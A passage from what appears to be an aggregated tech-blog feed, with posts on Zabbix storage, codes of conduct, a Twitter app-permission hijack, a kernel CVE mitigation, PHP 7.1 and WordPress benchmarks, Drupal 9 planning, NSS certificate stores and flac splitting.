ORDER BY COUNT(history.itemid) DESC
LIMIT 100;
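
To complement the row counts above with actual on-disk numbers, you can also ask MySQL/MariaDB directly for the table sizes (a rough sketch: it assumes your Zabbix schema is literally named "zabbix"; adjust the schema name and credentials to your setup):

mysql -u zabbix -p zabbix -e "
SELECT table_name,
       ROUND((data_length + index_length) / 1024 / 1024) AS size_mb
FROM information_schema.tables
WHERE table_schema = 'zabbix'
  AND (table_name LIKE 'history%' OR table_name LIKE 'trends%')
ORDER BY size_mb DESC;"

The items that top the queries above will usually also dominate these tables.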

The post Finding the biggest data (storage) consumers in Zabbix appeared first on ma.ttias.be.

These days, most large FLOSS communities have a "Code of Conduct"; a document that outlines the acceptable (and possibly not acceptable) behaviour that contributors to the community should or should not exhibit. By writing such a document, a community can arm itself more strongly in the fight against trolls, harassment, and other forms of antisocial behaviour that is rampant on the anonymous medium that the Internet still is.

Writing a good code of conduct is no easy matter, however. I should know -- I've been involved in such a process twice; once for Debian, and once for FOSDEM. While I was the primary author for the Debian code of conduct, the same is not true for the FOSDEM one; I was involved, and I did comment on a few early drafts, but the core of FOSDEM's current code was written by another author. I had wanted to write a draft myself, but then this one arrived and I didn't feel like I could improve it, so it remained.

While it's not easy to come up with a Code of Conduct, there (luckily) are others who walked this path before you. On the "geek feminism" wiki, there is an interesting overview of existing Open Source community and conference codes of conduct, and reading one or more of them can provide one with some inspiration as to things to put in one's own code of conduct. That wiki page also contains a paragraph "Effective codes of conduct", which says (amongst others) that a good code of conduct should include

Specific descriptions of common but unacceptable behaviour (sexist jokes, etc.)

The attentive reader will notice that such specific descriptions are noticeably absent from both the Debian and the FOSDEM codes of conduct. This is not because I hadn't seen the above recommendation (I had); it is because I disagree with it. I do not believe that adding a list of "don't"s to a code of conduct is a net positive to it.

Why, I hear you ask? Surely having a list of things that are not welcome behaviour is a good thing, which should be encouraged? Surely such a list clarifies the kind of things your community does not want to see? Having such a list will discourage that bad behaviour, right?

Well, no, I don't think so. And here's why.

Enumerating badness

A list of things not to do is like a virus scanner. For those not familiar with these: on some operating systems, there is a specific piece of software that everyone recommends you run, which checks if particular blobs of data appear in files on the disk. If they do, then these files are assumed to be bad, and are kicked out. If they do not, then these files are assumed to be not bad, and are left alone (for the most part).

This works if we know all the possible types of badness; but as soon as someone invents a new form of badness, suddenly your virus scanner is ineffective. Additionally, it also means you're bound to continually have to update your virus scanner (or, as the case may be, code of conduct) to a continually changing hostile world. For these (and other) reasons, enumerating badness is listed as number 2 in security expert Markus Ranum's "six dumbest ideas in computer security," which was written in 2005.

In short, a list of "things not to do" is bound to be incomplete; if the goal is to clarify the kind of behaviour that is not welcome in your community, it is usually much better to explain the behaviour that is wanted, so that people can infer (by their absence) the kind of behaviour that isn't welcome.

This neatly brings me to my next point...

Black vs White vs Gray.

The world isn't black-and-white. We could define a list of welcome behaviour -- let's call that the whitelist -- or a list of unwelcome behaviour -- the blacklist -- and assume that the work is done after doing so. However, that wouldn't be true. For every item on either the white or black list, there's going to be a number of things that fall somewhere in between. Let's call those things as being on the "gray" list. They're not the kind of outstanding behaviour that we would like to see -- they'd be on the white list if they were -- but they're not really obvious CoC violations, either. You'd prefer it if people don't do those things, but it'd be a stretch to say they're jerks if they do.

Let's clarify that with an example:

Is it a code of conduct violation if you post links to pornography websites on your community's main development mailinglist? What about jokes involving porn stars? Or jokes that denigrate women, or that explicitly involve some gender-specific part of the body? What about an earring joke? Or a remark about a user interacting with your software, where the women are depicted as not understanding things as well as men? Or a remark about users in general, that isn't written in a gender-neutral manner? What about a piece of self-deprecating humor? What about praising someone else for doing something outstanding?

I'm sure most people would agree that the first case in the above paragraph should be a code of conduct violation, whereas the last case should not be. Some of the items in the list in between are clearly on one or the other side of the argument, but for others the jury is out. Let's call those as being in the gray zone. (Note: no, I did not mean to imply that the list is ordered in any way ;-)

If you write a list of things not to do, then by implication (because you didn't mention them), the things in the gray area are okay. This is especially problematic when it comes to things that are borderline blacklisted behaviour (or that should be blacklisted but aren't, because your list is incomplete -- see above). In such a situation, you're dealing with people who are jerks but can argue about it because your definition of jerk didn't cover their behaviour. Because they're jerks, you can be sure they'll do everything in their power to waste your time about it, rather than improving their behaviour.

In contrast, if you write a list of things that you want people to do, then by implication (because you didn't mention it), the things in the gray area are not okay. If someone slips and does something in that gray area anyway, then that probably means they're doing something borderline not-whitelisted, which would be mildly annoying but doesn't make them jerks. If you point that out to them, they might go "oh, right, didn't think of it that way, sorry, will aspire to be better next time". Additionally, the actual jerks and trolls will have been given less tools to argue about borderline violations (because the border of your code of conduct is far, far away from jerky behaviour), so less time is wasted for those of your community who have to police it (yay!).

In theory, the result of a whitelist is a community of people who aspire to be nice people, rather than a community of people who simply aspire to be "not jerks". I know which kind of community I prefer.

Giving the wrong impression

During one of the BOFs that were held while I was drafting the Debian code of conduct, it was pointed out to me that a list of things not to do may give the impression to people that all these things on this list do actually happen in the code's community. If that is true, then a very long list may produce the impression that the given community is a community with a lot of problems.

Instead, a whitelist-based code of conduct will provide the impression that you're dealing with a healthy community. Whether that is the case obviously depends on more factors than just the code of conduct itself, but it will put people in the right mindset for this to become something of a self-fulfilling prophecy.

Conclusion

Given all of the above, I think a whitelist-based code of conduct is a better idea than a blacklist-based one. Additionally, in the few years since the Debian code of conduct was accepted, it is my impression that the general atmosphere in the Debian project has improved, which would seem to confirm that the method works (but YMMV, of course).

At any rate, I'm not saying that blacklist-based codes of conduct are useless. However, I do think that whitelist-based ones are better; and hopefully, you now agree, too ;-)

March 15, 2017

For the last 24 hours, the Twitter landscape has seen several official accounts hacked. The same Tweet was posted thousands of times. It was about the political conflict between Turkey and Holland:

Amnesty Fake Tweet

Many other accounts were affected (like the one of the EU Commission). Usually, Twitter accounts are hijacked simply due to weak credentials used to manage them and the lack of controls like 2FA. But this time, it was different. What do all those accounts have in common? They used a 3rd party service called Twitter Counter [Note: the Twitter Counter web site is currently “under maintenance”]. This service, amongst hundreds of others, offers nice features on top of Twitter to give you better visibility of your account. To achieve this, such services request access to your account. Access levels vary, from reading your timeline, seeing who you follow, or posting Tweets, up to changing your settings. More info is provided here by Twitter. For me, those services can be considered as plugins for a modern CMS: they provide nice features but can also increase the attack surface. That’s exactly the scenario seen today.

How to protect against this kind of attack? First, do not link your Twitter account to untrusted or suspicious applications. And, exactly like with mobile apps, do not grant access to everything! Least privilege must be applied. Why allow a statistics service to change your settings if read-only access to your timeline is sufficient?

Finally, the best advice is to visit the following link at regular intervals: https://twitter.com/settings/applications. During your first visit, you might be surprised to find so many applications linked to your account! Here is a small example:

Twitter Apps

Ideally, this list should be reviewed at regular intervals: revoke access for applications that you don’t use anymore, for apps that you don’t remember why you granted certain permissions to, or for any other suspicious app! Tip: create a reminder to perform this task every x months.

Oh, don’t forget that the same applies to other social networks too, like Facebook.

Stay safe!

[The post Keep Calm and Revoke Access has been first published on /dev/random]

Next week, it’s already the 10th edition of the TROOPERS conference in Heidelberg, Germany. I’ll be present and will cover the event via Twitter and daily wrap-ups. It will be my 3rd edition and, since the beginning, I have been impressed by the quality of the organization, from the content point of view but also from a technical point of view. There aren’t a lot of events that provide SIM cards so you can use their own mobile network! Besides the classic activities, there are the hacker-run, Packetwars and the charity action with auctions.

The event will be split into two phases. On Monday & Tuesday, NGI (“Next Generation Internet”) will take place and propose two different tracks: one focusing on IPv6 and the second on IoT. The schedule is available here. Here is the selection of talks that I’ll (try to) attend and cover:

  • What happened to your home? IoT Hacking and Forensic with 0-day
  • IPv6 Configuration Approaches for Servers
  • IoT to Gateway
  • Dissecting modern (3G/4G) cellular modems
  • RIPE Atlas, Measuring the Internet
  • Hidden in plain sight; How possibly could a decades old standard be broken?
  • An introduction to automotive ECU research
  • PUFs ‘n Stuff: Getting the most of the digital world through physical identities
  • BLE authentication design challenges on smartphone controlled IoT devices: analyzing Gogoro Smart Scooter
  • Metasploit Hardware Bridge Hacking
  • Hacking TP-Link Devices

On Wednesday and Thursday, regular talks are scheduled. There are three concurrent tracks: “Attack & research”, “Defense & management” and “SAP”. Personally, SAP is less interesting to me (I'm not working with this monster). Again, here is my current selection (most of them are from the “Defense & management” track):

  • Hunting Them All
  • Securing Network Automation
  • Vox Ex Machina
  • Architecting a Modern Defense using Device Guard
  • Exploring North Korea’s Surveillance Technology
  • Arming Small Security Programs: Network Baseline Generation and Alerts with Bropy
  • PHP Internals: Exploit Dev Edition
  • How we hacked Distributed Configuration Management Systems
  • Ruler – Pivoting Through Exchange
  • Demystifying COM
  • Graph me, I’m famous! – Automated static malware analysis and indicator extraction for binaries
  • Windows 10 – Endpoint Security Improvements and the Implant since Windows 2000

Nice program, plenty of interesting topics! Keep an eye here for some wrap-up’s. And, if you’re in Heidelberg, ping me if you want to chat.

 

[The post TROOPER 10 Ahead! has been first published on /dev/random]

I published the following diary on isc.sans.org: “Retro Hunting!“.

For a while, one of the security trends is to integrate information from 3rd-party feeds to improve the detection of suspicious activities. By collecting indicators of compromise, other tools may correlate them with their own data and generate alerts on specific conditions. The initial goal is to share new IOC’s with peers as fast as possible to improve the detection capability and, maybe, prevent further attacks or infections… [Read more]

[The post [SANS ISC Diary] Retro Hunting! has been first published on /dev/random]

Are you a Uni student and interested in hardware, FPGAs or embedded programming? You could get paid to hack by applying to the TimVideos.us organisation for Google Summer of Code!

The TimVideos.us project is participating in Google Summer of Code 2017 (GSoC2017) and is looking for students to hack on the hardware used to record many open source conferences - including;
  • Linux.conf.au (LCA2017)
  • many PyCons around the world (PyCon AU, pyOhio, Kiwi PyCon & PyCon ZA)
  • DebConf (DebConf2016)
Due to the focus on hardware, they are very interested in students with an interest in things like FPGAs, VHDL/Verilog and other HDLs, embedded C programming and operating systems, and electronic circuit/PCB design.

More details: https://hdmi2usb.tv/gsoc/fpga/hardware/python/linux/2017/03/15/gsoc-announcement !

(Mostly sharing this because this open video hardware might fit FOSDEM very well in the future...)

March 14, 2017

Oracle Linux major releases happen every few years. Oracle Linux 7 is the current version and this was released back in 2014, Oracle Linux 6 is from 2011, etc... When a major release goes out the door, it sort of freezes the various packages at a point in time as well. It locks down which major version of glibc, etc.

Now, that doesn't mean that there won't be anything new added over time; of course security fixes and critical bugfixes get backported from new versions into these various packages, and a good number of enhancements/features also get backported over the years. Very much so on the kernel side, but in a number of cases also in the various userspace packages. However, for the most part the focus is on stability and consistency. This is also the case with the different tools and compilers/languages. A concrete example: OL7 provides Python 2.7.5. This base release of Python will not change in OL7 in newer updates; making a big change would break compatibility, so it's kept stable at 2.7.5.

A very important thing to keep reminding people of, however, is the fact that CVEs do get backported into these versions. I often hear someone ask if we ship a newer version of, say, openssl, because some CVE or other is fixed in that newer version - but typically that CVE would also be fixed in the versions we ship with OL. There is a difference between openssl the open source project, with CVEs fixed 'upstream', and openssl shipped as part of Oracle Linux, maintained and bug fixed over time with backports from upstream. We take care of critical bugs and security fixes in the current shipping versions.

Anyway - there are other Linux distributions out there that 'evolve' much more frequently and by doing so, out of the box tend to come with newer versions of libraries and tools and packages and that makes it very attractive for developers that are not bound to longer term stability and compatibility. So the developer goes off and installs the latest version of everything and writes their apps using that. That's a fine model in some cases but when you have enterprise apps that might be deployed for many years and have a dependency on certain versions of scripting languages or libraries or what have you, you can't just replace those with something that's much newer, in particular much newer major versions. I am sure many people will agree that if you have an application written in python using 2.7.5 and run that in production, you're not going to let the sysadmin or so just go rip that out and replace it with python 3.5 and assume it all just works and is transparently compatible....

So does that mean we are stuck? No... there is a yum repository called the Software Collections Library which we make available to everyone on our freely accessible yum server. That library gets updated on a regular basis (we are at version 2.3 right now) and it contains newer versions of many popular packages, typically newer compilers, toolkits, etc. (such as GCC, Python, PHP, Ruby...) -- things that developers want to use and for which they are looking for more recent versions.

The channel is not enabled by default: you have to go in and edit /etc/yum.repos.d/public-yum-ol7.repo and set the ol7_software_collections repo to enabled=1. When you do that, you can then go and install the different versions that are offered. You can just browse the repo using yum or look online (similar channels exist for Oracle Linux 6). When you go and install these different versions, they get installed in /opt and they won't replace the existing versions. So if you have Python installed by default with OL7 (2.7.5) and install Python 3.5 from the software collections, this new version goes into /opt/rh/rh-python35. You can then use the scl utility to selectively enable which application uses which version.
An example :

scl enable rh-python35 -- bash 
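
Putting the pieces together, an end-to-end session could look roughly like this (a sketch: yum-config-manager comes with the yum-utils package and is simply an alternative to editing the .repo file by hand; exact package and Python versions may differ):

yum install -y yum-utils
yum-config-manager --enable ol7_software_collections
yum install -y rh-python35
scl enable rh-python35 -- python --version   # reports the 3.5.x interpreter from /opt/rh
python --version                             # the system interpreter stays at 2.7.5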

One little caveat to keep in mind: if you have an early version of OL7 or OL6 installed, we do not modify the /etc/yum.repos.d/public-yum-ol7.repo file after initial installation (because we might overwrite changes you made), so it is always a good idea to get the latest version from our yum server. (You can find them here.) The channel/repo name might have changed or a new one could have been added.

As you can see, Oracle Linux is/can be a very current developer platform. The packages are there, they are just provided in a model that keeps stability and consistency. There is no need to go download upstream package source code and compile it yourself and replacing system toolkits/compilers that can cause incompatibilities.

March 13, 2017

Funny how even the software developers at the CIA have problems with idiots who want to put binaries in git. They also know about Git-Flow, my preferred git branching workflow. I kind of wonder how come, if they know about Git-Flow, we see so few leaked NSA and CIA tools with correct semver versioning. Sometimes it’s somewhat okayish, like you can see here. But v1.0-RC3 is not really semver if you see how they got there here. To start with, your alpha versions start with 0.0.x. So where are all those versions under 0.0.x that happened before release candidate 3? 1.0, 1.1-beta, 1.0-phase2, 1.0-beta1-, 1.0-beta-7. WTF guys. That’s not a good versioning scheme. Just call it 0.0.1, 0.0.2, 0.1.0, 0.1.1, 0.1.2 for the betas. And when the thing sees first usage, start calling it 1.0.0, 1.0.1, 1.0.2, 1.1.0, 1.1.1, 1.2.0 etc. What’s wrong with that? And how are all these words like alpha-1, beta-2, phase2, etc any better? Maybe just fire your release maintainer! Admittedly for that 2.0.x series they at least tried to get it right.

The point is that packaging tools can be configured to let other packages depend on these version numbers. In x.y.z the x number has implications on API incompatibility whereas the y number can be used for compatible feature additions.

I can imagine that different malwares, exploits, rootkits, intrusion tools they develop would pose incompatibilities with each other, and that for example the NSA and CIA want to share libraries and link without having to recompile or repackage. So versioning to indicate ABI and API compatibility wouldn’t be a bad idea. Let’s hope in the next round of massive leaks we see them having learned good software development processes and practices.

They are doing Scrum sprints and do retrospectives, though. That’s not so bad.

March 10, 2017

I published the following diary on isc.sans.org: “The Side Effect of GeoIP Filters“.

IP location, GeoIP or Geolocalization are terms used to describe techniques to assign geographic locations to IP addresses.  Databases are built and maintained to link the following details to IP addresses:

  • Country
  • Region
  • City
  • Postal code
  • Internet Service Provider
  • Coordinates (Longitude, Latitude)
  • Autonomous system (BGP)

There are many IP location service providers like Maxmind or DB-IP… [Read more]

[The post [SANS ISC Diary] The Side Effect of GeoIP Filters has been first published on /dev/random]

March 09, 2017

The post WordPress on PHP 7.1 appeared first on ma.ttias.be.

Since I care about performance, features and security, I decided to upgrade my webservers' PHP version from 5.6 to the latest PHP 7.1.2. I run mostly WordPress websites, so what's the impact of such a PHP version upgrade on WordPress?

At the time of writing, PHP 5.6 is in extended support, meaning it'll still get security updates, but no more bugfixes. The PHP 7.x release is the only actively supported PHP branch, of which PHP 7.1 is the latest version.

Let's start with some benchmarks.

Performance improvements with WordPress on PHP 7.1

First, some numbers, before I go all graph on you.

I took a fairly big page on this blog (and a popular one, too) to run the ab benchmark against: Google’s QUIC protocol: moving the web from TCP to UDP.

The goal is to execute 300 requests as quickly as possible, 2 at a time (concurrency = 2).

$ ab -c 2 -n 300 https://ma.ttias.be/googles-quic-protocol-moving-web-tcp-udp/

For the sake of this test, I decided to disable the static HTML caching, I want the raw PHP performance.

The results (averaged out, as I did the test several times) -- lower is better;

  • PHP 5.6: 94.3 seconds
  • PHP 7.1: 74.5 seconds (22% faster)

For comparison, I also took a Laravel application I made called DNS Spy and did the same benchmark.

  • PHP 5.6: 40.1 seconds
  • PHP 7.1: 30.2 seconds (25% faster)

It's safe to assume PHP 7.1 is considerably faster than 5.6 with about 25% raw speed improvements. And this isn't counting the memory savings you get, because the 7.x branch is much more memory efficient than 5.6 (I just didn't accurately measure that to benchmark).
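
If you do want a quick, if crude, idea of the memory side, the resident set size of the PHP-FPM workers is a reasonable proxy. A sketch, assuming the workers show up under the php-fpm process name on your system:

$ ps -o rss= -C php-fpm | awk '{ sum += $1; n++ } END { if (n) printf "%d workers, %.1f MB average RSS\n", n, sum / n / 1024 }'

Run it under the same ab load on both PHP versions and compare.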

In a graph, the above timings are actually rather boring. In absolute numbers, it's the difference between an average response time of 350ms vs 250ms. Yes, it matters, but in a graph with spikes, it doesn't say much.

Things get more interesting when you look at pages that take more time to load, like the RSS feed in WordPress. This graph shows the RSS timings for the posts and the comments (2 separate requests).

In that graph, it's gone from an average response time of 610ms (for both feeds) to 280 ms. That's more than twice as fast as on PHP 5.6!

WordPress compatibility on PHP 7.1

The million dollar question is, of course: what did I break by upgrading?

So far: nothing.

But I should point out, most of my blogs have a very limited set of plugins and are simple in both design and functionality.

WordPress itself will run, as a minimum requirement, on PHP 5.2.4 or higher. That's a bug, not a feature. That old PHP version should've been buried and forgotten a long time ago.

But there's an upside, too: because they still support PHP 5.2.x, they can't use any of the newer features of PHP 5.3 (namespacing), PHP 5.4 (traits, short array syntax), 5.5 (OPCache instead of APC), ... so WordPress core is really boring PHP. That boring PHP will run on pretty much any PHP version, including the 7.x branches.

Plugins are a different matter: popular plugins, like the Yoast SEO Plugin, will actively begin to encourage users to upgrade to a later PHP version. This is excellent news. It also means plugins are going to be your risk when upgrading PHP versions, as their supported PHP versions may vary.

Functionality testing on PHP 7.1

Limited, but this is what I tested (by writing this post) and what still works, flawlessly;

  • Post writing & editing
  • File uploads
  • GUI & text editor
  • Dashboard, WordPress statistics & widgets
  • Plugin updates & auto-updates

Seems to be the biggest pieces of functionality, to me.

PHP warnings & errors

This won't show in the GUI, but your error logs from PHP-FPM may start to show things like this;

$ tail -f php/error.log
[09-Mar-2017 20:41:54 UTC] PHP Warning:  A non-numeric value encountered in /var/www/vhosts/ma.ttias.be/htdocs/wp-content/plugins/.../Abstract.php on line 371
[09-Mar-2017 20:42:17 UTC] PHP Warning:  A non-numeric value encountered in /var/www/vhosts/ma.ttias.be/htdocs/wp-content/plugins/.../Abstract.php on line 371
[09-Mar-2017 20:43:54 UTC] PHP Warning:  A non-numeric value encountered in /var/www/vhosts/ma.ttias.be/htdocs/wp-content/plugins/.../Abstract.php on line 371

Since I have no interest in maintaining plugins and lack the time to learn how SVN works again to submit a PR or patch, I simply disabled warnings in PHP.
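
If you want to do the same, the relevant knob is the error_reporting directive in the php.ini (or FPM pool configuration) your site uses; a minimal sketch, with the path and the exact set of suppressed levels being up to you:

; hide warnings (and deprecation/strict noise) without hiding actual errors
error_reporting = E_ALL & ~E_DEPRECATED & ~E_STRICT & ~E_WARNING

$ systemctl restart php-fpm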

Conclusion: WordPress + PHP 7.1 = ❤️

For me, it just works. No quirks, faster performance & a fully supported PHP version.

What's stopping you from upgrading?

The post WordPress on PHP 7.1 appeared first on ma.ttias.be.

The post CVE-2017-2636: Linux local privilege escalation flaw in ‘n_hdlc’ appeared first on ma.ttias.be.

This comes just weeks after the previous local root exploit (CVE-2017-6074 – local privilege escalation in DCCP).

This is an announcement of CVE-2017-2636, which is a race condition in the n_hdlc Linux kernel driver (drivers/tty/n_hdlc.c). It can be exploited to gain a local privilege escalation.

This driver provides HDLC serial line discipline and comes as a kernel module in many Linux distributions, which have CONFIG_N_HDLC=m in the kernel config.

Source: Linux kernel: CVE-2017-2636: local privilege escalation flaw in n_hdlc

Patching is, luckily, relatively trivial, as was the DCCP vulnerability.

$ echo "install n_hdlc /bin/true" >> /etc/modprobe.d/disable-n_hdlc.conf

Make sure to roll that one to your fleet of servers today!
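
A quick way to verify the state of a given machine (a small sketch; output will obviously vary):

$ lsmod | grep n_hdlc                    # is the module loaded right now?
$ modprobe --dry-run --verbose n_hdlc    # with the override in place, this should resolve to "install /bin/true"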

The post CVE-2017-2636: Linux local privilege escalation flaw in ‘n_hdlc’ appeared first on ma.ttias.be.

March 08, 2017

One of the key reasons that Drupal has been successful is because we always made big, forward-looking changes. As a result, Drupal is one of very few CMSes that has stayed relevant for 15+ years. The downside is that with every major release of Drupal, we've gone through a lot of pain adjusting to these changes. The learning curve and difficult upgrade path from one major version of Drupal to the next (e.g. from Drupal 7 to Drupal 8) has also held back Drupal's momentum. In an ideal world, we'd be able to innovate fast yet provide a smooth learning curve and upgrade path from Drupal 8 to Drupal 9. We believe we've found a way to do both!

Upgrading from Drupal 8.2 to Drupal 8.3

Before we can talk about the upgrade path to Drupal 9, it's important to understand how we do releases in Drupal 8. With the release of Drupal 8, we moved Drupal core to use a continuous innovation model. Rather than having to wait for years to get new features, users now get sizable advances in functionality every six months. Furthermore, we committed to providing a smooth upgrade for modules, themes, and distributions from one six-month release to the next.

This new approach is starting to work really well. With the 8.1 and 8.2 updates behind us and 8.3 close to release, we have added some stable improvements like BigPipe and a new status report page, as well as experimental improvements for outside-in, workflows, layouts, and more. We also plan to add important media improvements in 8.4.

Most importantly, upgrading from 8.2 to 8.3 for these new features is not much more complicated than simply updating for a bugfix or security release.

Upgrading from Drupal 8 to Drupal 9

After a lot of discussion among the Drupal core committers and developers, and studying projects like Symfony, we believe that the advantages of Drupal's minor upgrade model (e.g. from Drupal 8.2 to Drupal 8.3) can be translated to major upgrades (e.g. from Drupal 8 to Drupal 9). We see a way to keep innovating while providing a smooth upgrade path and learning curve from Drupal 8 to Drupal 9.

Here is how we will accomplish this: we will continue to introduce new features and backwards-compatible changes in Drupal 8 releases. In the process, we sometimes have to deprecate old systems. Instead of removing old systems, we will keep them in place and encourage module maintainers to update to the new systems. This means that modules and custom code will continue to work. The more we innovate, the more deprecated code there will be in Drupal 8. Over time, maintaining backwards compatibility will become increasingly complex. Eventually, we will reach a point where we simply have too much deprecated code in Drupal 8. At that point, we will choose to remove the deprecated systems and release that as Drupal 9.

This means that Drupal 9.0 should be almost identical to the last Drupal 8 release, minus the deprecated code. It means that when modules take advantage of the latest Drupal 8 APIs and avoid using deprecated code, they should work on Drupal 9. Updating from Drupal 8's latest version to Drupal 9.0.0 should be as easy as updating between minor versions of Drupal 8. It also means that Drupal 9 gives us a clean slate to start innovating more rapidly again.

Why would you upgrade to Drupal 9 then? For the great new features in 9.1. No more features will be added to Drupal 8 after Drupal 9.0. Instead, they will go into Drupal 9.1, 9.2, and so on.

To get the most out of this new approach, we need to make two more improvements. We need to change core so that the exact same module can work with Drupal 8 and 9 if the module developer uses the latest APIs. We also need to provide full data migration from Drupal 6, 7 and 8 to any future release. So long as we make these changes before Drupal 9 and contributed or custom modules take advantage of the latest Drupal 8 APIs, up-to-date sites and modules may just begin using 9.0.0 the day it is released.

What does this mean for Drupal 7 users?

If you are one of the more than a million sites successfully running on Drupal 7, you might only have one more big upgrade ahead of you.

If you are planning to migrate directly from Drupal 7 to Drupal 9, you should reconsider that approach. In this new model, it might be more beneficial to upgrade to Drupal 8. Once you’ve migrated your site to Drupal 8, subsequent upgrades will be much simpler.

We have more work to do to complete the Drupal 7 to Drupal 8 data migration, but the first Drupal 8 minor release that fully supports it could be 8.4.0, scheduled to be released in October 2017.

What does this mean for Drupal developers?

If you are a module or theme developer, you can continually update to the latest APIs each minor release. Avoid using deprecated code and your module will be compatible with Drupal 9 the day Drupal 9 is released. We have plans to make it easy for developers to identify and update deprecated code.

What does this mean for Drupal core contributors?

If you are a Drupal core contributor and want to introduce new improvements in Drupal core, Drupal 8 is the place to do it! With backwards compatibility layers, even pretty big changes are possible in Drupal 8.

When will Drupal 9 be released?

We don't know yet, but it shouldn't matter as much either. Innovative Drupal 8 releases will go out on schedule every six months and upgrading to Drupal 9 should become easy. I don't believe we will release Drupal 9 any time soon; we have plenty of features in the works for Drupal 8. Once we know more, we'll follow up with more details.

Thank you

Special thanks to Alex Bronstein, Alex Pott, Gábor Hojtsy, Nathaniel Catchpole and Jess (xjm) for their contributions to this post.

I published the following diary on isc.sans.org: “Not All Malware Samples Are Complex“.

Everyday we hear about new pieces of malware which implement new techniques to hide themselves and defeat analysts. But they are still people who write simple code that just “do the job”. The sample that I’m reviewing today had a very short lifetime because it was quickly detected by most antivirus. Its purpose is to steal information from the infected computers like credentials… [Read more]

[The post [SANS ISC Diary] Not All Malware Samples Are Complex has been first published on /dev/random]

March 06, 2017

I recently created a new article on the Gentoo Wiki titled Certificates which talks about how to handle certificate stores on Gentoo Linux. The write-up of the article (which might still change name later, because it does not handle everything about certificates, mostly how to handle certificate stores) was inspired by the observation that I had to adjust the certificate stores of both Chromium and Firefox separately, even though they both use NSS.

Certificates?

Well, when a secure communication is established from a browser to a site (or any other interaction that uses SSL/TLS, but let's stay with the browser example for now) part of the exchange is to ensure that the target site is actually the site it claims to be. Don't want someone else to trick you into giving your e-mail credentials do you?

To establish this, the certificate presented by the remote site is validated (alongside other handshake steps). A certificate contains a public key, as well as information about what the certificate can be used for, and who (or what) the certificate represents. In case of a site, the identification is (or should be) tied to the fully qualified domain name.

Of course, everyone could create a certificate for accounts.google.com and try to trick you into leaving your credentials. So, part of the validation of a certificate is to verify that it is signed by a third party that you trust to only sign certificates that are trustworthy. And to validate this signature, you hence need the certificate of this third party as well.

So, what about this certificate? Well, turns out, this one is also often signed by another certificate, and so on, until you reach the "top" of the certificate tree. This top certificate is called the "root certificate". And because we still have to establish that this certificate is trustworthy, we need another way to accomplish this.

Enter certificate stores

The root certificates of these trusted third parties (well, let us call them "Certificate Authorities" from now onward, because they sometimes will lose your trust) need to be reachable by the browser. The location where they are stored in is (often) called the truststore (a naming that I came across when dealing with Java and which stuck).

So, what I wanted to accomplish was to remove a particular CA certificate from the certificate store. I assumed that, because Chromium and Firefox both use NSS as the library to support their cryptographic uses, they would also both use the store location at ~/.pki/nssdb. That was wrong.

Another assumption I had was that NSS also uses the /etc/pki/nssdb location as a system-wide one. Wrong again (not that NSS doesn't allow this, but it seems that it is very much up to, and often ignored by, the NSS-implementing applications).

Oh, and I also assumed that there wouldn't be a hard-coded list in the application. Yup. Wrong again.

How NSS tracks root CAs

Basically, NSS has a hard-coded root CA list inside the libnssckbi.so file. On Gentoo, this file is provided by the dev-libs/nss package. Because it is hard-coded, it seemed like there was little I could do to remove a certificate from it; yet, through the user interfaces offered by Firefox and Chromium, I was still able to remove the trust bits from the certificate.

Turns out that Firefox (inside ~/.mozilla/firefox/*.default) and Chromium (inside ~/.pki/nssdb) store the (modified) trust bits for those locations, so that the hardcoded list does not need to be altered if all I want to do was revoke the trust on a specific CA. And it isn't that this hard-coded list is a bad list: Mozilla has a CA Certificate Program which controls the CAs that are accepted inside this store.

Still, I find it sad that the system-wide location (at /etc/pki/nssdb) is not used by default as well (or I have something wrong on my system that makes it so). On a multi-user system, administrators who want to have some control over the certificate stores might currently need to either use login scripts to manipulate the user certificate stores, or adapt the user files directly.
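For completeness, the same trust-bit tweaking can also be done from the command line with NSS's certutil tool (if you have the NSS command-line utilities installed). A minimal sketch, assuming the per-user store at ~/.pki/nssdb and a made-up CA nickname taken from the listing:

$ certutil -d sql:$HOME/.pki/nssdb -L
$ certutil -d sql:$HOME/.pki/nssdb -M -n "Some CA Nickname" -t ",,"

The first command lists the certificates and their trust flags, the second clears the trust bits for the named CA in that store.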

March 05, 2017

flac

You may have backed up your music CDs using a single flac file instead of a file for each track. In case you need to split the CD flac, do this:

Install the needed software:

$ sudo apt-get install cuetools shntool

Split the album flac file into separate tracks:

$ cuebreakpoints sample.cue | shnsplit -o flac sample.flac

Copy the flac tags (if present):

$ cuetag sample.cue split-track*.flac

The full howto can be found here (aidanjm).

Update (April 18th, 2009):
In case the cue file is not a separate file, but included in the flac file itself do this as the first step:

$ metaflac --show-tag=CUESHEET sample.flac | grep -v ^CUESHEET > sample.cue

(NB: the regular syntax is “metaflac --export-cuesheet-to=sample.cue sample.flac”, however the cue file is often embedded in a tag instead of the cuesheet block).

Update (March 5th, 2017):
In case the source file is one unsplit ape file, you can convert it to flac first.

$ sudo apt-get install ffmpeg

$ ffmpeg -i sample.ape sample.flac


Posted in Uncategorized Tagged: flac, GNU/Linux, music

March 04, 2017

I published the following diary on isc.sans.org: “How your pictures may affect your website reputation“.

In a previous diary, I explained why the automatic processing of IOC’s (“Indicator of Compromise”) could lead to false positives. Here is a practical example found yesterday. I captured the following malicious HTML page (MD5: b55a034d8e4eb4504dfce27c3dfc4ac3)[2]. It is part of a phishing campaign and tries to lure the victim to provide his/her credentials to get access to an Excel sheet… (Read more)

[The post [SANS ISC Diary] How your pictures may affect your website reputation has been first published on /dev/random]

March 03, 2017

The post Log all queries in a Laravel CLI command appeared first on ma.ttias.be.

For most web-based Laravel projects, you can use the excellent laravel-debugbar package to have an in-browser overview of all your queries being executed per page. For commands run via Artisan at the command line, you need an alternative.

This is a method I've used quite often while working on DNS Spy, since most of the application logic is inside worker jobs, executed only via the CLI.

So here's a quick method of logging all your SQL queries to the console output instead.

<?php

use Illuminate\Support\Facades\DB;

public function handle()
{
    // Register a listener that receives every executed query
    // and dumps its raw SQL to the console.
    DB::listen(function ($sql) {
        var_dump($sql->sql);
    });
}

First, import the DB Facade.

Next, add a new listener for every query being executed, and let it var_dump() the query. Alternatively, you can use dump() or dd(), too.

The result:

$ php artisan queue:work
...
string(170) "select * from `xxx` where `xxx`.`record_id` = ? and `xxx`.`record_id` is not null ..."
string(146) "insert into `xxx` (`value`, `nameserver_id`, `ttl`, ... ) values (?, ?, ?, ...)"

Adding a DB listener is a convenient way of seeing all your queries right at the console, for times when the debugbar can't be used!

The post Log all queries in a Laravel CLI command appeared first on ma.ttias.be.

March 02, 2017

After a long time of getting too little attention from me, I decided to make a new cvechecker release. There are few changes in it, but I am planning on making a new release soon with lots of clean-ups.

March 01, 2017

